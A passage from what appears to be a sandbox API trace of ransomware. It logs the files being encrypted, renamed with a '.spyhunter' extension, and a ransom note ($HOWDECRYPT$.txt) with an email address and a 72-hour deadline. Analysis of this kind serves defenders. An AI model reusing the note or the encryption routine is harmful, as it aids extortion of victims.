hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.191] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cee14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cee14*=0x2800, lpOverlapped=0x0) returned 1 [0146.192] GetProcessHeap () returned 0x2c0000 [0146.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0146.192] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.192] WriteFile (in: hFile=0x178, lpBuffer=0x25cee54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cee14, lpOverlapped=0x0 | out: lpBuffer=0x25cee54*, lpNumberOfBytesWritten=0x25cee14*=0x4, lpOverlapped=0x0) returned 1 [0146.193] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cee14, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cee14*=0x30, lpOverlapped=0x0) returned 1 [0146.193] CloseHandle (hObject=0x178) returned 1 [0146.193] GetProcessHeap () returned 0x2c0000 [0146.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.193] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll.spyhunter") returned 86 [0146.193] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll.spyhunter")) returned 1 [0146.194] GetProcessHeap () returned 0x2c0000 [0146.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.194] GetProcessHeap () returned 0x2c0000 [0146.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0146.194] GetProcessHeap () returned 0x2c0000 [0146.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f309a8 | out: hHeap=0x2c0000) returned 1 [0146.194] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee58 | out: pbBuffer=0x25cee58) returned 1 [0146.194] GetProcessHeap () returned 0x2c0000 [0146.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0146.194] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee50*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee50*=0x30) returned 1 [0146.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0146.195] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll") returned 75 [0146.195] StrStrW (lpFirst="PPINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0146.195] GetProcessHeap () returned 0x2c0000 [0146.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0146.195] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cee14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cee14*=0x2800, lpOverlapped=0x0) returned 1 [0146.389] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.389] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cee14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cee14*=0x2800, lpOverlapped=0x0) returned 1 [0146.389] GetProcessHeap () returned 0x2c0000 [0146.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0146.389] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.389] WriteFile (in: hFile=0x178, lpBuffer=0x25cee54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cee14, lpOverlapped=0x0 | out: lpBuffer=0x25cee54*, lpNumberOfBytesWritten=0x25cee14*=0x4, lpOverlapped=0x0) returned 1 [0146.443] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cee14, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cee14*=0x30, lpOverlapped=0x0) returned 1 [0146.443] CloseHandle (hObject=0x178) returned 1 [0146.443] GetProcessHeap () returned 0x2c0000 [0146.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.444] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll.spyhunter") returned 85 [0146.444] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll.spyhunter")) returned 1 [0146.444] GetProcessHeap () returned 0x2c0000 [0146.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.444] GetProcessHeap () returned 0x2c0000 [0146.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0146.444] GetProcessHeap () returned 0x2c0000 [0146.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff6248 | out: hHeap=0x2c0000) returned 1 [0146.444] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee50 | out: pbBuffer=0x25cee50) returned 1 [0146.444] GetProcessHeap () returned 0x2c0000 [0146.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0146.445] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee48*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee48*=0x30) returned 1 [0146.445] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0146.446] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll") returned 73 [0146.446] StrStrW (lpFirst="MAPIR.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0146.446] GetProcessHeap () returned 0x2c0000 [0146.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0146.447] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cee0c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cee0c*=0x2800, lpOverlapped=0x0) returned 1 [0146.448] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.448] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cee0c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cee0c*=0x2800, lpOverlapped=0x0) returned 1 [0146.448] GetProcessHeap () returned 0x2c0000 [0146.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0146.448] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.448] WriteFile (in: hFile=0x178, lpBuffer=0x25cee4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cee0c, lpOverlapped=0x0 | out: lpBuffer=0x25cee4c*, lpNumberOfBytesWritten=0x25cee0c*=0x4, lpOverlapped=0x0) returned 1 [0146.451] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cee0c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cee0c*=0x30, lpOverlapped=0x0) returned 1 [0146.451] CloseHandle (hObject=0x178) returned 1 [0146.451] GetProcessHeap () returned 0x2c0000 [0146.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.451] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll.spyhunter") returned 83 [0146.451] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll.spyhunter")) returned 1 [0146.452] GetProcessHeap () returned 0x2c0000 [0146.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.452] GetProcessHeap () returned 0x2c0000 [0146.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0146.452] GetProcessHeap () returned 0x2c0000 [0146.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5c28 | out: hHeap=0x2c0000) returned 1 [0146.452] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee50 | out: pbBuffer=0x25cee50) returned 1 [0146.452] GetProcessHeap () returned 0x2c0000 [0146.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0146.452] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee48*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee48*=0x30) returned 1 [0146.452] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0146.453] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll") returned 77 [0146.453] StrStrW (lpFirst="GRINTL32.REST.trx_dll", lpSrch=".txt") returned 0x0 [0146.453] GetProcessHeap () returned 0x2c0000 [0146.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0146.453] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cee0c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cee0c*=0x2800, lpOverlapped=0x0) returned 1 [0146.468] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.469] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cee0c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cee0c*=0x2800, lpOverlapped=0x0) returned 1 [0146.470] GetProcessHeap () returned 0x2c0000 [0146.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0146.470] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.470] WriteFile (in: hFile=0x178, lpBuffer=0x25cee4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cee0c, lpOverlapped=0x0 | out: lpBuffer=0x25cee4c*, lpNumberOfBytesWritten=0x25cee0c*=0x4, lpOverlapped=0x0) returned 1 [0146.471] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cee0c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cee0c*=0x30, lpOverlapped=0x0) returned 1 [0146.471] CloseHandle (hObject=0x178) returned 1 [0146.471] GetProcessHeap () returned 0x2c0000 [0146.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.471] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll.spyhunter") returned 87 [0146.471] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll.spyhunter")) returned 1 [0146.472] GetProcessHeap () returned 0x2c0000 [0146.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.472] GetProcessHeap () returned 0x2c0000 [0146.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0146.472] GetProcessHeap () returned 0x2c0000 [0146.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f30520 | out: hHeap=0x2c0000) returned 1 [0146.472] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee48 | out: pbBuffer=0x25cee48) returned 1 [0146.472] GetProcessHeap () returned 0x2c0000 [0146.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0146.472] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee40*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee40*=0x30) returned 1 [0146.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\ppcrlconfig.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0146.473] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlconfig.dll") returned 60 [0146.473] StrStrW (lpFirst="ppcrlconfig.dll", lpSrch=".txt") returned 0x0 [0146.473] GetProcessHeap () returned 0x2c0000 [0146.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0146.473] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cee04, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cee04*=0x2800, lpOverlapped=0x0) returned 1 [0146.544] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.544] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cee04, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cee04*=0x2800, lpOverlapped=0x0) returned 1 [0146.544] GetProcessHeap () returned 0x2c0000 [0146.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0146.544] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.544] WriteFile (in: hFile=0x178, lpBuffer=0x25cee44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cee04, lpOverlapped=0x0 | out: lpBuffer=0x25cee44*, lpNumberOfBytesWritten=0x25cee04*=0x4, lpOverlapped=0x0) returned 1 [0146.725] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cee04, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cee04*=0x30, lpOverlapped=0x0) returned 1 [0146.725] CloseHandle (hObject=0x178) returned 1 [0146.725] GetProcessHeap () returned 0x2c0000 [0146.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.725] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.spyhunter") returned 70 [0146.725] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\ppcrlconfig.dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\ppcrlconfig.dll.spyhunter")) returned 1 [0146.838] GetProcessHeap () returned 0x2c0000 [0146.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.838] GetProcessHeap () returned 0x2c0000 [0146.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0146.838] GetProcessHeap () returned 0x2c0000 [0146.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3030218 | out: hHeap=0x2c0000) returned 1 [0146.838] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee48 | out: pbBuffer=0x25cee48) returned 1 [0146.838] GetProcessHeap () returned 0x2c0000 [0146.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0146.838] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee40*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee40*=0x30) returned 1 [0146.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.844] GetProcessHeap () returned 0x2c0000 [0146.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0146.844] GetProcessHeap () returned 0x2c0000 [0146.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbd3f8 | out: hHeap=0x2c0000) returned 1 [0146.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0146.845] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0146.845] WriteFile (in: hFile=0x178, lpBuffer=0x25ced77*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceea0, lpOverlapped=0x0 | out: lpBuffer=0x25ced77*, lpNumberOfBytesWritten=0x25ceea0*=0x127, lpOverlapped=0x0) returned 1 [0146.861] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0146.861] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceea0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceea0*=0x2ac, lpOverlapped=0x0) returned 1 [0146.861] CloseHandle (hObject=0x178) returned 1 [0146.861] GetProcessHeap () returned 0x2c0000 [0146.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc1770 | out: hHeap=0x2c0000) returned 1 [0146.861] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee40 | out: pbBuffer=0x25cee40) returned 1 [0146.861] GetProcessHeap () returned 0x2c0000 [0146.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0146.861] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee38*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee38*=0x30) returned 1 [0146.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.862] GetProcessHeap () returned 0x2c0000 [0146.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0146.862] GetProcessHeap () returned 0x2c0000 [0146.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc1648 | out: hHeap=0x2c0000) returned 1 [0146.862] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee38 | out: pbBuffer=0x25cee38) returned 1 [0146.862] GetProcessHeap () returned 0x2c0000 [0146.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0146.862] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee30*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee30*=0x30) returned 1 [0146.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.863] GetProcessHeap () returned 0x2c0000 [0146.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0146.863] GetProcessHeap () returned 0x2c0000 [0146.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f68358 | out: hHeap=0x2c0000) returned 1 [0146.863] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee38 | out: pbBuffer=0x25cee38) returned 1 [0146.863] GetProcessHeap () returned 0x2c0000 [0146.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0146.863] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee30*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee30*=0x30) returned 1 [0146.863] CreateFileW 